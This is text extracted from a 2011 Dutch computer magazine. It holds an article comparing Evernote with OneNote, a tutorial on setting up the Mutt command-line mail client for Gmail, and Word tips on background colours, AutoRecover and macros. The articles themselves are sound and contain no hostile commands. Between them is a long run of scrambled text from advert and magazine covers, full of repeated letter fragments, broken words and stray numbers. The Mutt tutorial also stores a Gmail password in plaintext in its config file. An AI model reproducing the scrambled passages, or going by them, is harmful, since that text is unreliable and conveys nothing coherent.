smartphone. Het voert automatisch elke vijftien minuten een ‘sync’ uit met de Evernote-servers. Elke notitie geeft u een duidelijke naam en desgewenst tags. Zoeken gaat daarna snel op inhoud of op de tagnamen. Naast de gewone notities zijn er ook nog ‘ink notes’, waarop u met een (virtuele) pen schrijft of tekent, en ‘webcam notes’, waarop u een opname zet die u met uw webcam hebt gemaakt. ‘Ink notes’ zijn ook doorzoekbaar, zolang u maar een duidelijk handschrift hebt! Aan elke notitie zijn bovendien ook bestanden toe te voegen. Hebt u bijvoorbeeld een notitie gemaakt over een huis dat u wilt huren of kopen, dan kunt u een foto of document toevoegen. Plug-ins voor Firefox, Internet Explorer en Chrome zijn er ook, zodat u webpagina’s met één muisklik aan Evernote kunt toevoegen
Gratis of premium? Zoals met zoveel van dit soort online diensten is er een gratis en betaalde versie. Met het gratis account komt u al een heel eind: u kunt een onbeperkt aantal notities aanmaken. De beperking zit hem in maximaal 60 MB aan notities per maand uploaden of synchroniseren. Toch kunt u allen in tekst er zo al enkele duizenden kwijt. Als u ook documenten of bestanden toevoegt, kan het wel al snel krap worden. Met de gratis versie zijn alleen afbeeldingen, pdf-bestanden en audio te synchroniseren, en pdf-bestanden zijn niet doorzoekbaar. Een Premium-account kost US$ 5 per maand (of US$ 45 per jaar) en laat u toe om eender welk bestandstype toe te voegen. U kunt tot 1 GB aan notities per maand toevoegen en van elke notities wordt er ook een geschiedenis bijgehouden, zodat u steeds op een vorige versie kunt teruggrijpen. De ‘killer’ feature van de Premium-account is echter dat pdf-bestanden ook doorzoekbaar zijn. Een notitie mag tot 50 MB
| SOFTWARE
Evernote of OneNote? Hebt u op uw pc Microsoft Office staan, dan hebt u wellicht ook het programma OneNote. Met OneNote maakt u aantekeningen die een stuk multimedialer zijn dan die van Evernote. Elke notitie kunt u helemaal naar uw wensen inrichten en formatteren, met tekeningen, tekst, takenlijstjes, schermafdrukken, enzovoorts. De nieuwste versie laat het ook toe om elke notitie automatisch te synchroniseren met Windows Live SkyDrive, zodat u de notities overal bij de hand hebt. Grote voordeel is de integratie met de andere Office-programma’s: zo kunt u bijvoorbeeld heel gemakkelijk Outlook-taken aanmaken vanuit een notitieboek in OneNote. Versie 2010 heeft ook uitstekende ocr (optical character recognition) aan boord, zodat ingescande documenten snel doorzoekbaar gemaakt worden, net als in Evernote. Toch heeft OneNote ook een aantal nadelen ten opzichte van Evernote: het taggen en het categoriseren van notities is overzichtelijker en Evernote kan ook bestanden die in een bepaalde map staan automatisch importeren. Evernote ondersteunt ook veel meer mobiele platformen. Tot slot is Evernote gratis en heeft het een veel kleinere ‘footprint’ op het systeem zodat het een stuk sneller werkt. OneNote kost € 69 (Home & Student-versie), of is er als onderdeel van Office 2010 (€ 140).
groot zijn en u kunt op uw smartphone notebooks downloaden en ze zo onderweg lezen. Met een scanner wordt Evernote, en dan vooral de Premium-versie, pas echt interessant. Krijgt u ook nog veel documenten met de post binnen, of bewaart u nog veel ‘papier’? Denk dan aan facturen, garantiebewijzen, rekeningen, bonnetjes, visitekaartjes, et cetera. Die documenten houdt u wellicht bij in mappen, dossiers of dozen. Hebt u een document nodig, dan is het zoeken geblazen. U kunt natuurlijk alles archiveren, nummeren en indexeren, maar daar bent u een tijdje zoet mee. En wat als u nu net een document dringend nodig hebt, maar u bent niet thuis? Evernote kan een uitkomst zijn: scan elk document in en laat Evernote ze automatisch in een notebook
Er worden ook vele mobiel apps ontwikkeld
PC-ACTIVE | Nr. 245 – 2011
404 Evernote.indd 47
47
10-02-2011 14:58:00
SOFTWARE
| EVERNOTE
Veilig?
zodat ze zelf plug-ins of toepassingen voor Evernote kunnen ontwikkelen. Die houdt Evernote bij in de ‘Trunk’ of de ‘koffer’. Zo zijn er een twintigtal toepassingen voor Evernote op de desktop, zoals Gruml, waarmee rss-nieuwsitems naar Evernote worden gestuurd, en TimeBridge, waarmee vergaderingsnotities in Evernote worden opgeslagen. Er zijn ook tientallen mobiele apps die Evernote-ondersteuning bieden, zoals Seesmic, waarmee u Twitter- en Facebookberichten toevoegt aan Evernote, en Read It Later, om artikels en webpagina’s op te slaan in Evernote. Ook leuk is de hardware in de Evernote-trunk, gaande van diverse scanners en een intelligente pen, die elke handgeschreven tekst automatisch naar Evernote stuurt, tot Wacom-pen-tablets die ook met Evernote verbonden zijn.
Veel PC-Active-lezers maken zich (terecht) zorgen over de veiligheid van dit soort diensten: al uw notities en bestanden worden namelijk opgeslagen op servers van een (Amerikaans) bedrijf. De datatransfer zelf gebeurt steeds met ssl-versleuteling en Evernote zelf beweert dat niemand toegang heeft tot de bestanden op de server, die ook versleuteld worden opgeslagen. Toch valt dat allemaal moeilijk te verifiëren: er mogen dan geen gevallen bekend zijn van ongeoorloofde toegang, in theorie is het altijd mogelijk dat een of andere Amerikaanse overheidsinstantie in uw bestanden gaat snuffelen, zonder dat u er zelf iets van af weet. U moet dus goed overwegen of u dit er voor over hebt voor het gemak van overal toegang krijgen tot uw eigen bestanden en notities. Maar dat is natuurlijk ook het geval bij andere clouddiensten als Dropbox, Windows Live Sync of Box.net. U kunt wel bepaalde notities of paragrafen zelf versleutelen (klik er met de rechtermuisknop op en kies Encrypt selected text), maar dan zijn deze notities niet meer doorzoekbaar (en voor bestanden of pdf’s kan dit niet).
INFORMATIE
zetten. Evernote indexeert elk document automatisch, wat het terugzoeken vergemakkelijkt. Eenmaal ingescande documenten kunt u later altijd weer printen als u een afdruk nodig hebt.
Evernote www.evernote.com NeverNote nevernote.sourceforge.net Microsoft OneNote office.microsoft.com/nl-nl/onenote/
De ‘trunk’ Evernote mag dan niet open source zijn, het stelt wel een sdk ter beschikking van programmeurs
IDEE!
ABONNEMENT STOPT AUTOMATISCH
NU � NUMMERS VOOR ��,�� VERANT OORD LEUKE GLAMOUR BOY MANUEL BROEKMAN
OEUVRE INTERVIEW
MONIC HENDRICK ILM VOOR ILM
KIJKEN KIJK KI JKEN JK EN IIN N DE IEL IEL
COEN CO EN V VERBRAAK ER E RBR BRAA AA AK OVER OV E INTERVIE ER IINT NT TER ERVI VIE VI E EN
STERRE ORTA E
TOSCA NITERINK EN ANITA JANSSEN S REKEN TV KOK GORDON RAMSAY
EDETINEERD EDE E D TI DE TIN N
VARAGIDS V VA RA R AG GII BAJES TO BAJE BA JES JE ST
BALKENENDENORM
MEER DAN EURO
E E ELI ELICITEERD L ICI LI CII TE C T EER TEER RD
CURSUS C CU CURS U RS S US IIN N
ILMS IILM LMS LM MS
INTERVIEW INTE IN N TE TERV RV RVIE V IE EW
HOE H HO OE ORD ORD D IIK K L LE IDER ID ER ER LEIDER
THEO TH T HE EO O MAASSEN MA AA A ASS SS S SEN N
BOMVOL CULTUUR!
O M MOOIE O O IE OO IE N NATUUR AT ATUU T UU UR
U GIDS GID DS TUSSEN TUSS TU USS SEN EN DE G DE NO OES S GNOES
WWW.VARA.NL W WW WWW WW.VA VA V A RA. R NL RA N
47
OOK OO OK
ALAIN ALAI AL AIN AI N DE DELON ELO ON ORD O RD R DT ORDT
20-26 NOVEMBER 2010
•
INTERVIEW
•
•
UIT(HALEN) MET CORNALD MAAS
30 OKTOBER-5 NOVEMBER 2010
TOON HERMANS
VOLGENS JACQUES KLÖTERS
BUIS & HAARD
JOCHEM JOCH CH HEM M MYJER
STIJLBOEK
RICK BRANDSTEDER
DOCUMENTAIRE
DE STONES IN SHINE A LIGHT
WWW.VARA.NL
STIJL VOL ENS
OORDIG
WWW.VARA.NL WWW W WW W.VA VARA. RA N RA. NL L
WWW.VARA.NL
NEDER O VOLGENS DE JEUGD VAN TEGEN
WWW.VARA.NL
LUISTERTEST
28 AUGUSTUS-3 SEPTEMBER 2010
6-12 NOVEMBER 2010
4 - 10 SEPTEMBER 2010 € €0,50 0,50
T
N EEN E TCT E
RA MM 28 PR OG
Paul’sow KadoshVARA
1000 columns!
att i ie
TNT POST PORT BETAALD
47-coverABO.indd 1
a er
a l
itte a
leest zichzelf terug
O
TNT POST PORT BETAALD
W
R
GRAT
IS
uitmarkt
’
VA RA
TNT POST PORT BETAALD
s ree t 10-11-2010 09:32:07
44-coverABO.indd 1
18-10-2010 12:16:15
45-coverABO.indd 1
25-10-2010 12:55:55
naar Thom de ni eu Vint as ‘Festewe erbe n’ rg!
mooi solo!
Jacqueline Govaert 35-coverABRI.indd 1
A’ S WA AR
VE RH EU GE
N DI T NA
JA AR
GIELJAZZ OP RADIO 6
Hart & Giel
NU
50 CE NT
de soulliefde van beelen
AP
8
W E ON S OP
0 3 6 1 0
717729 550144
10-08-2010 14:42:59
Weet u nog waar u het zoeken moet in het overweldigende media-aanbod? De programma’s die prikkelen, verdiepen of vermaken? Dankzij een handige indeling en relevante artikelen weet u precies wat u niet mag missen. En wat u kunt overslaan. Proef zelf of laat iemand de VARAgids proeven.
BEL ���������
(€ 0,10 p/m) VARA’s Publieks- en Ledenservice (op werkdagen van 9:00-17:00 uur) of ga naar VARAgids.nl
HET GROOTSTE LINUX-TIJDSCHRIFT VAN NEDERLAND! Linux Magazine is het enige Nederlandse tijdschrift dat zich al tien jaar lang richt op gebruikers van open source software en Linux in het bijzonder. Je vindt er nieuws en achtergronden uit de open source-wereld, besprekingen van open source software en distributies en veel praktische workshops. Voor zowel beginnende als gevorderde Linux-gebruikers is Linux Magazine ideaal om meer te leren over de ontwikkelingen en mogelijkheden van open source software.
Neem nhuts voor slec
€ee1n a9bon,n5em0 ent
Kortingsabonnement • Neem nu een voordelig kortingsabonnement op Linux Magazine • Voor een jaar Linux Magazine (6 edities) betaal je normaal € 25,• Neem je nu een abonnement, dan betaal je slechts € 19,50 (€ 22,50 in België)
Surf naar www.hubstore.nl/linux 10-10 Linux 2011.indd 2
11/9/10 12:02:02 PM
E-MAILEN OP DE COMMANDLINE
MUTT TEKST : KOEN VERVLOESEM
Naast grafische e-mailclients en webmail is er nog een derde categorie e-mailclients die vaak over het hoofd gezien wordt: commandline-programma’s. Deze zijn populair onder powerusers van Linux en andere Unix-systemen, maar zelfs onder Windows kunt u ze draaien. Daarom bekijken we eens Mutt, een populaire commandline e-mailclient waarmee u na de nodige inwerktijd zeer efficiënt kunt e-mailen.
H
et eerste voordeel van Mutt – en eigenlijk dé reden waarom u het zou willen gebruiken – is dat het volledig met het toetsenbord wordt bestuurd. Denk hier eens bij na: wanneer u e-mailt, bent u de hele tijd met tekst in de weer, u bent namelijk aan het typen, en dus staat het toetsenbord centraal. Maar als u nieuwe e-mails wilt ontvangen, een andere map met e-mails wilt openen of een bijlage bij een e-mail wilt toevoegen, moet u meestal tot de muis teruggrijpen. En ook al hebben veel programma’s wel sneltoetsen voor veel gebruikte acties, geen enkele heeft voor álle acties sneltoetsen. Een commandline client als Mutt daarentegen kan alles met het toetsenbord. Dat betekent dat u, als u de nodige toetscombinatie eenmaal doorhebt, ongelooflijk snel kunt e-mailen en andere acties met uw e-mail kunt uitvoeren. Geen enkele grafische e-mailclient kan dezelfde efficiëntie bereiken. Bovendien is een commandline client ook minder zwaar dan een grafische. Het nadeel is dat gewenning enige tijd kost: het werkt niet allemaal vanzelf. Instellingen vindt u bijvoorbeeld niet mooi in een instellingenvenster, maar moet u zelf in een configuratiebestand ingeven. Het voordeel is wel dat de instellingen veel flexibeler zijn dan die van veel grafische clients, waardoor u Mutt echt aan uw eigen smaak kunt aanpassen. We tonen hoe u Mutt onder Ubuntu 10.10 gebruikt om een Gmail-account via imaps te lezen. Natuurlijk kunt u ook uw e-mail via pop3s. We leggen u wel uit hoe u uw e-mail over ssl leest, want veiligheid gaat voor alles. We gebruiken dus bewust geen imap maar imaps. En tot slot: ook Windows-gebruikers laten we niet in de kou staan. In een kader leggen we uit hoe u Mutt in Windows installeert. In Ubuntu installeert u Mutt met de terminalopdracht sudo apt-get install mutt. Voor extra functionaliteit moet u eens kijken naar de pakketten muttprint, mutt-vc-query en muttprofile.
50
405 Mutt.indd 50
Basisconfiguratie De configuratie van Mutt gebeurt in het bestand .muttrc in uw persoonlijke map. Typ daarin het volgende: set from="[email protected]" set realname="Voornaam Achternaam" set smtp_url="smtps://gebruikersnaam@ smtp.gmail.com:465/" set smtp_pass="wachtwoord" Hier geeft u dus het e-mailadres en uw naam in die anderen te zien krijgen in de mail die u hun stuurt. We geven hier ook de smtp-server van Gmail en het wachtwoord in, voor het verzenden. Daarna definiëren we de toegang tot mails via imaps: set folder="imaps://imap.gmail.com:993" set imap_user="[email protected]" set imap_pass="wachtwoord" Nu definiëren we nog de locatie van een aantal imapmappen in Gmail: set spoolfile="+INBOX" set postponed="+[Gmail]/Drafts" set trash="imaps://imap.gmail.com/[Gmail]/ Trash" Omdat we met imap werken en we niet elke keer de e-mails in onze inbox opnieuw willen downloaden, houden we een cache bij. Daarvoor moeten we eerst nog de juiste directory aanmaken, namelijk .mutt/cache in uw persoonlijke map: $ mkdir -p .mutt/cache In .muttrc verwijzen we dan naar deze directory om een cache van gedownloade e-mails bij te houden, zowel van de headings als van de berichten zelf: set header_cache="~/.mutt/cache/headers" set message_cachedir="~/.mutt/cache/bodies"
PC-ACTIVE | Nr. 245 – 2011
10-02-2011 13:14:40
MUTT
Tot slot nog enkele instellingen om het leven met imap gemakkelijker te maken: set move=no set imap_keepalive=900 Sla dit configuratiebestand op in ~/.muttrc en zorg ervoor dat niemand anders het kan lezen (chmod 700 ~/.muttrc), want uw wachtwoord voor Gmail staat erin! Start Mutt nu op. Hebt u een grote inbox, dan kan het downloaden de eerste keer wel even duren. Overigens moet u misschien nog in de instellingen van Gmail de mogelijkheid om uw e-mails via imap te lezen inschakelen. Ga daarvoor in de webinterface van Gmail naar Settings | Forwarding and POP/IMAP.
Lezen en mails sturen De basisfunctionaliteit van Mutt werkt nu al. U krijgt al uw e-mails in uw inbox te zien en u kunt er met de pijltjestoetsen en Page Up/Page Down door navigeren. Druk op enter bij een geselecteerde e-mail om ze te lezen, en daarna op i om terug naar uw inbox te gaan. Mails uit uw inbox verwijderen kan met d en undeleten met u. Dat undeleten kan tot het moment dat u Mutt afsluit, want de mails worden pas echt verwijderd wanneer u bij het afsluiten (met q) de vraag of verwijderde mails echt moeten worden verwijderd, bevestigend beantwoordt. Als u niet telkens deze vraag wilt krijgen, voegt u set delete=yes aan uw configuratiebestand toe. Op een e-mail antwoorden kan door op r te drukken terwijl de e-mail geselecteerd is. En wanneer u enkel de nog niet gelezen mails wilt zien in uw inbox, typt u l en dan unread. Wilt u terug alles zien, typ dan l en all. Met c kunt u een andere map openen. Typ daarna de naam in of druk op Tab om de beschikbare mappen te zien en kies er dan
| SOFTWARE
één. Met s slaat u de geselecteerde e-mail op in een andere map. Een nieuwe mail sturen is eenvoudig: druk op m, geef het e-mailadres van de ontvanger en het onderwerp van uw e-mail in, waarna Mutt de standaardeditor van uw besturingssysteem opent. Onder Ubuntu is dat bijvoorbeeld standaard nano, maar als u bijvoorbeeld liever Vim of Emacs gebruikt om uw e-mails in te typen, kan dat eenvoudig door in het configuratiebestand set editor=vim te zetten. In nano typt u gewoon uw e-mail en sluit u de editor af met Ctrl+X, waarna u wordt gevraagd om de e-mail op te slaan (in een tijdelijk bestand). Druk daarvoor op y en daarna enter. Hierna krijgt u nog een overzicht te zien van enkele e-mailheaders, zoals de afzender, ontvanger, onderwerp, enzovoorts. U kunt hier nu bijvoorbeeld nog andere ontvangers toevoegen, het onderwerp aanpassen of personen in Cc: of Bcc: zetten. Een bijlage toevoegen kan door op a te drukken, waarna u de bestandsnaam ingeeft. Bovenaan het scherm worden de beschikbare sneltoetsen getoond. Als u uw e-mail definitief wilt verzenden, drukt u op y. Verzonden mails worden overigens automatisch in de Sent Mail folder van Gmail opgeslagen. Wilt u daarentegen de e-mail nog niet verzenden, druk dan op q, waarna u de vraag krijgt om de e-mail uit te stellen. Kiest u no, dan wordt uw e-mail verwijderd; kiest u yes, dan wordt uw e-mail in de Drafts-map opgeslagen en krijgt u de volgende keer als u een e-mail wilt versturen met m de vraag of u een e-mail uit de Drafts-map verder wilt schrijven.
Fine-tunen Na een tijdje met Mutt te werken, zult u zich zeker aan een aantal zaken ergeren of u afvragen of sommige
Uw inbox in Mutt
PC-ACTIVE | Nr. 245 – 2011
405 Mutt.indd 51
51
10-02-2011 13:15:28
SOFTWARE
| MUTT
zaken niet anders kunnen. Dan wordt het tijd om de documentatie van Mutt eens te lezen, bijvoorbeeld de manpagina van .muttrc (op te roepen met de opdracht man muttrc). Wat bijvoorbeeld met sorteren? Standaard sorteert Mutt alle mails in uw inbox volgens het tijdstip van ontvangst, zodat u de nieuwste e-mails onderaan te zien krijgt. Maar zo krijgt u geen overzicht op threads, iets wat u wel in de webinterface van Gmail krijgt. Om toch een gedrag zoals Gmail te hebben, zet u de volgende twee regels in uw .muttrc: set sort=threads set sort_aux=last-date-received In de eerste regel zeggen we dat Mutt zijn e-mails per thread moet ordenen, en de tweede regel definieert hoe threads ten opzichte van elkaar worden geordend, evenals vertakkingen van een thread ten opzichte van elkaar. Als u de recentste threads juist bovenaan wilt zien, voegt u reverse- toe voor de waarde in sort_aux. Overigens kunt u nu een volledige thread in één keer verwijderen door op Ctrl+d te drukken als u één van de mailtjes in een thread hebt geselecteerd. U kunt ook kiezen hoe de hoofdkoppen van e-mails worden getoond als u een e-mail opent. Standaard toont Mutt de datum, from, to, het onderwerp en de mailclient, allemaal in dezelfde kleur. We kunnen echter zelf instellen welke hoofdkoppen we willen zien en in welke kleur, zodat u een beter overzicht hebt. Een voorbeeld: ignore * unignore from x-mailer date to cc subject hdr_order from x-mailer date to cc subject color header brightmagenta default ^Date: color header brightyellow default ^Subject: We geven hier aan de datum een magenta kleur en aan de titel geel, beide felgekleurd zodat ze onmiddellijk opvallen. U kunt voor bijna alles een kleur instellen, bijvoorbeeld om lachebekjes in e-mails in het geel weer te geven: color body brightyellow default " [;:]-*[)>(<|]" En nu we toch bezig zijn, kunnen we e-mailadressen en url’s die in een e-mail worden vermeld ook in een opvallende kleur tonen: color body brightcyan default "[-a-z_0-9.%$]+@[-a-z_0-9.]+\\. [-a-z][-a-z]+" color body brightwhite default "(http|ftp|news|telnet|finger): //[^ \">\t\r\n]*" color body brightwhite default "mailto:[-a-z_0-9.]+@[-a-z_0-9.]+" En nog enkele handigheidjes:
52
405 Mutt.indd 52
set signature="~/.mutt/signature" Met deze optie geeft u op dat u de inhoud van het bestand .mutt/signature onder al uw e-mails wilt tonen. Hierin zet u dan bijvoorbeeld uw adresgegevens. set fast_reply Met deze optie voorkomt u dat Mutt u – steeds wanneer u op een e-mail antwoordt – bevestiging vraagt om hetzelfde onderwerp te houden en naar dezelfde persoon te antwoorden. Meestal wilt u dit immers toch niet veranderen, en in de zeldzame gevallen dat u dit wel wilt, kan dat nog na het typen van uw mailtekst.
Sneltoetsen U kunt ook extra sneltoetsen definiëren. Een voorbeeld: bind editor <space> noop macro index gi "=INBOX <enter>" "Go to inbox" macro index ga "=[Gmail] /All Mail<enter>" "Go to all mail" macro index gs "=[Gmail] /Sent Mail<enter>" "Go to Sent Mail" macro index gd "=[Gmail] /Drafts<enter>" "Go to drafts" macro index gp "=[Gmail] /Spam<enter>" "Go to Spam" De eerste regel zorgt ervoor dat spaties in namen van mappen niet voor problemen zorgen. En dan definieren we de sneltoets gi als toets om naar uw inbox te gaan, gs voor uw verzonden mails, enzovoort. De eerste keer dat u een van deze mappen opent, moet u overigens weer rekenen op heel wat vertraging omdat alle berichtkoppen eerst moeten worden ingeladen. Vanaf de volgende keren kunt u met de sneltoetsen echter vlot tussen uw mappen overschakelen. Als u ? intypt, krijgt u de huidige gedefinieerde sneltoetsen en hun bijbehorende actie te zien. Daar zult u uw zojuist gedefinieerde sneltoetsen ook tussen zien staan. Onderaan de lijst krijgt u de acties te zien waarvoor nog geen sneltoetsen gedefinieerd zijn.
Save hooks Verder kunt u nog zogenaamde save-hooks instellen. Dit betekent dat Mutt e-mails die aan bepaalde voorwaarden voldoen automatisch naar een bepaalde map verplaatst als u op s voor save drukt, zodat u niet meer de mappen hoeft op te geven. Enkele voorbeelden maken de mogelijkheden duidelijk: save-hook "~f @mijnwerk.nl" +Work save-hook "~C @mijnwerk.nl" +Work save-hook "~s \[SPAM\]" +[Gmail]/Spam De eerste regel slaat mails die van het domein van uw werk komen automatisch op in de map Work van
PC-ACTIVE | Nr. 245 – 2011
10-02-2011 13:16:34
MUTT
| SOFTWARE
Mutt in Windows Als u Mutt in Windows wilt gebruiken, moet u eerst Cygwin installeren, dat een Linux-omgeving in Windows emuleert. Nadat u het installatieprogramma van Cygwin hebt opgestart en enkele vragen hebt beantwoord, krijgt u de vraag welke extra pakketten u wilt installeren naast de basispakketten. Typ mutt in het zoekveld in en navigeer in de resultaten naar de categorie All | Mail. Klik bij Mutt op Skip en daarna nog een keer om versie 1.4 van het pakket voor installatie te selecteren en klik daarna onderaan rechts op Volgende. In het volgende venster krijgt u te zien dat Mutt nog een aantal andere pakketten vereist, zoals OpenSSL, en u klikt gewoon op Volgende. Daarna worden alle pakketten geïnstalleerd. In de laatste stap laat u het beste een snelkoppeling naar Cygwin op uw bureaublad maken, waardoor u eenvoudig met een dubbelklik op het icoontje een Cygwin-terminalvenster opent. Daarna kunt u Mutt gewoon in dit terminalvenster starten zoals u het in Linux gewend bent.
Ook in Windows kunt u Mutt gebruiken, dankzij Cygwin
Gmail. De tweede regel doet hetzelfde met e-mailtjes die het domein van uw werk vermelden in To: of Cc:. De derde slaat een mail die in het onderwerp aangeduid staat als [SPAM] op in de spam-map van Gmail als u op s drukt. Mutt kent hooks voor allerlei acties, zoals een send-hook, open-hook, close-hook, folder-hook, enzovoorts. Voor powerusers zijn dit onmisbare hulpmiddelen om uw mailclient naar uw hand te zetten. Met folder-hook kunt u bijvoorbeeld voor specifieke mappen andere instellingen in Mutt gebruiken.
het bestand ~/.mailcap aangeduid staat. Daarom installeren we de commandline-webbrowser (ja, dat bestaat ook!) Links, en zetten we in .mailcap het volgende: text/html; links %s; nametemplate=%s.html text/html; links -dump %s; nametemplate= %s.html; copiousoutput
HTML
We hebben de basis van Mutt uitgelegd waarmee u al een vrij efficiënte workflow voor e-mail hebt. De rest zult u zelf moeten fine-tunen naar uw eigen smaak. Want dat is het grote voordeel van Mutt: het is enorm personaliseerbaar. Het vereist wel even wat opzoekwerk, maar het resultaat is de moeite: in enkele toetsindrukken handelt u uw e-mails af.
Een probleem met commandline mailclients zoals Mutt is dat ze niet zo goed weten om te gaan met html-e-mails. Toch kunt u er nog met enkele aanpassingen het beste van maken. Zet bijvoorbeeld de volgende optie in .muttrc: auto_view text/html alternative_order text/plain text/html text Wanneer er dan html in een e-mail is, wordt deze automatisch getoond omwille van de eerste regel, en met de tweede regel zeggen we dat we wel de tekstversie willen tonen als die er is. Mutt kent zelf echter geen html, dus daarvoor gebruikt het programma dat in
Links kent geen Javascript, dus met Mutt hoeft u niet bang te zijn voor dubieuze scriptjes in html-e-mails: u krijgt gewoon de tekst in de html te zien.
HAAL MEER UIT… KLEUR, NAVIGATIE EN MACRO’S IN WORD TEKST : HANS NIEPOTH
In een serie artikelen bekijken we afzonderlijk de veelgebruikte programma’s uit de populaire Office-suite van Microsoft. We geven een aantal tips en trucs. De een kent u misschien al, maar er zitten er ongetwijfeld ook bij waarvan u zegt: ‘a ha, handig’!
W
ord heeft lang een optie geboden om een nostalgisch WordPerfect-scherm in blauw met witte letters aan te zetten, maar deze optie is sinds Word2007 verdwenen. Niet dat dat erg is, want Word2007 en 2010 hebben een veel fraaiere optie. Te vinden onder Pagina-indeling | Pagina-achtergrond | pictogram Paginakleur. Een klik op het pictogram opent het venster Themakleuren/Standaardkleuren. Staat de liveweergave aan (Opties voor Word | Algemeen | vakje Livevoorbeelden), dan wordt de aangewezen kleur direct in het document weergegeven. Kiest u een donkere kleur dan wordt automatisch ook de tekst wit afgedrukt. Het omslagpunt verschilt per gekozen kleur en blijkt niet instelbaar. Bent u niet tevreden met de geboden kleuren, dan is er nog de mogelijkheid zelf een kleur samen te stellen in een RGB- of HSLkleurmodel. Als achtergrond kunt u verder nog een patroon, een kleurovergang met twee kleuren of een afbeelding kiezen. Het is eenvoudig ook alles weer uit te zetten via de knop Geen kleur. De achtergrondkleur is alleen van kracht voor het huidige document en blijft
54
behouden bij opslaan. Bij het afdrukken wordt de achtergrond standaard niet meegenomen, tenzij u onder de Opties voor Word bij de Weergave | Afdrukopties expliciet het vakje Achtergrondkleuren en –afbeeldingen afdrukken aanvinkt. Op deze manier stelt u een achtergrond in voor het hele document, maar wat als u alleen een of twee alinea’s van een ander kleurtje wilt voorzien? Ook hiervoor is een oplossing. Volg hiervoor het pad Start | Alinea | pictogram Randen en arcering. In het lijstje selecteert u vervolgens de laatste regel Randen en arcering en dan tabblad Arcering. In het vakje Opvullen kunt u vervolgens via hetzelfde kleurenschema als hierboven een kleur selecteren. Als alternatief kunt u ook een patroon met een stijl naar keuze en een tweede kleur selecteren. Als u bevestigt met OK wordt de functie uitgevoerd voor de alinea waarin de cursor staat of de geselecteerde alinea’s.
Toch nog een versie beschikbaar! Regelmatig zelf opslaan van uw bestanden is een prima manier om uw werk veilig te stellen, maar de functie AutoHerstel kan u een hoop narigheid besparen. Als u lang aan een document werkt en uw systeem crasht of de stroom valt uit, dan bent dankzij AutoHerstel hooguit enkele minuten werk kwijt. Om AutoHerstel in te schakelen of aan te passen klikt u op de Office-knop (in Office2010 ook wel de Backstageknop genoemd) en selecteert u onder Opties voor Word de rubriek Opslaan. In het venster dat wordt geopend kunt u opgeven om de hoeveel minuten AutoHerstel een document opslaat, in welk formaat en op welke locatie. Standaard staat het tijdsinterval waarop een herstelbestand wordt opgeslagen op tien minuten,
PC-ACTIVE | Nr. 245 – 2011
404 word-tips.indd 54
11-02-2011 09:34:48
WORD
| SOFTWARE
Niet opgeslagen documenten herstellen. Redder in nood!
Ook enkele alinea van een achtergrondkleur voorzien, is mogelijk
maar u kunt een bestand zo vaak als u wilt automatisch laten opslaan. U kunt een waarde tussen 1 en 120 minuten invullen. Na een vastloper kunt u bij het opnieuw starten van Word verder met het laatst opgeslagen herstelbestand. Ook als u meerdere documenten had geopend, worden alle netjes hersteld. Tot zover komen Word2007 en Word2010 overeen. In Word2010 is de functie verder uitgebreid en kunt u ook niet-opgeslagen versies terughalen. Ga hiervoor naar Bestand | Opties | Opslaan. In het Opties-venster schakelt u daarvoor het vakje De laatste automatisch opgeslagen versie behouden als ik afsluit zonder op te slaan in. Als u in eerdere versies van Word bij het afsluiten op de vraag Opslaan? abusievelijk op Nee drukte, was u uw werk kwijt en ook het autoherstel bood hierbij geen remedie. In Word2010 kunt u het laatste nietopgeslagen bestanden terugvinden onder Bestand | Info | Versies. Eerdere niet-opgeslagen documenten vindt u terug in Bestand | Recent onder de knop Niet-opgeslagen documenten herstellen. Prominent aanwezig is de functie niet. U vindt hem in het venster onder het uitgebreide overzicht met recente documenten en recente locaties onder Bestand | Recent. De herstelfunctie brengt u naar de speciale map C:\Users\User_Name\AppData\ Local\Microsoft\Office\UnsavedFiles, waar u de bestanden gewoon kunt openen. Bestanden in deze map worden gedurende vier dagen na de aanmaakdatum bewaard en de bestandslocatie kan niet worden gewijzigd. Een alternatieve route naar de map vindt u onder Bestand | Info | Versies beheren. De functie ‘automatisch laatste versie behouden’ werkt verder alleen als ook AutoHerstel is ingeschakeld.
Meer versies Handig natuurlijk zo’n back-up, maar er is meer. Word2010 slaat bij het automatisch herstel niet één enkel bestand op, maar meerdere. Bij elke AutoHerstel-
actie wordt er een nieuwe versie gemaakt, totdat u het bestand handmatig opslaat. U vindt de hele reeks onder Bestand | Info | Versies. Daarbij is de functie ook nog slim. Staat de AutoHerstel-tijd bijvoorbeeld op vijf of tien minuten en u bent een hapje eten of u zit in die tijd iets anders te doen, maar niet te werken in Word, dan wordt die AutoHerstel-ronde gewoon overgeslagen. U kunt dus niet opgezadeld worden met twee identieke versies. Het werken met versies maakt het tekstverwerken een stuk aangenamer. Stel dat u enkele alinea’s hebt gewist die u achteraf toch in de tekst wilt hebben of een eerder geschreven paragraaf blijkt toch beter dan de laatste. Dan kunt u eenvoudig terugvallen op een eerdere versie zonder dat u deze expliciet hebt opgeslagen. Een dubbelklik op een vorige versie opent deze als alleen-lezen document (u kunt er echter wel uit kopiëren), terwijl een waarschuwingsbalk bovenin u laat weten dat de versie automatisch is opgeslagen en dat er een nieuwere versie beschikbaar is. Op de balk vindt u ook twee knoppen: Herstellen en Vergelijken. Met Herstellen overschrijft u de huidige versie met de vorige, met Vergelijken opent u het revisievenster waarin u beide documenten naast elkaar zet en alle wijzigingen nog eens kunt doornemen.
Navigatie Een alinea verplaatsen, is niet erg moeilijk. Druk Alt+Shift in en vervolgens de pijltoets Omhoog om de alinea boven de voorgaande te zetten of de pijltoets Omlaag om de hele alinea een positie naar beneden te verschuiven. Om een woord in een zin te verplaatsen blijkt er geen toets combinatie te bestaan. Geen gemis, we maken die functie gewoon zelf met een macro. Zet eerst de cursor op een woord midden in een zin. Om een toetsenbordmacro op te nemen gaat u eerst naar het macromenu onder lintcategorie Beeld | Macro’s en selecteert u de regel Macro opnemen. In het eerste ven-
PC-ACTIVE | Nr. 245 – 2011
404 word-tips.indd 55
55
11-02-2011 09:35:16
SOFTWARE
| WORD
De macrocode van onze opname
